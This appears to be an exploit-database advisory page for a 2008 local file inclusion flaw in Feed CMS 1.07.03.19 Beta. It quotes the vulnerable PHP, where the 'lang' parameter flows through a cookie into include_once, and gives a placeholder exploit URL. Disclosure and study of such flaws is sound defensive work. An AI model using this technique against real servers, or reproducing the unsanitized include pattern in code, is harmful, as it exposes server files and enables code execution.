header-logo
Suggest Exploit
vendor:
Feed CMS
by:
x0r
7.5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: Feed CMS
Affected Version From: 1.07.03.19 Beta
Affected Version To: 1.07.03.19 Beta
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Feed Cms 1.07.03.19 Beta LFI

Feed CMS 1.07.03.19 Beta is vulnerable to a local file inclusion vulnerability due to a lack of sanitization of user-supplied input to the 'lang' parameter in the 'index.php' script. An attacker can exploit this vulnerability to include arbitrary local files from the web server and execute arbitrary code.

Mitigation:

Input validation should be used to prevent the inclusion of arbitrary files.
Source

Exploit-DB raw data:

###############################
Feed Cms 1.07.03.19 Beta LFI
###############################
Autore: x0r
Email: andry2000@hotmail.it
Download:
http://heanet.dl.sourceforge.net/sourceforge/feedcms/FeedCms1.07.03.19Beta.rar
###############################
Bug In: index.php

if ($_GET['lang'])
{
	$language = $_GET['lang'];
	
	setcookie('firstlang',$language,time()+3600*240*365);
	header('location:'.$redirect);
}
$lang = $_COOKIE['firstlang'] ? $_COOKIE['firstlang'] : $lang;
include_once($FeedCms_Dir."lang/$lang/$lang.php");

LFI By Cookie ^ ^

Exploit: 

http://[site]/FeedCms/?lang=[LFI] ^ ^

Greetz: A Te Che Mi Hai Cambiato La Vita...

# milw0rm.com [2008-12-11]

Navigation

Suggest Exploit

Services By CQR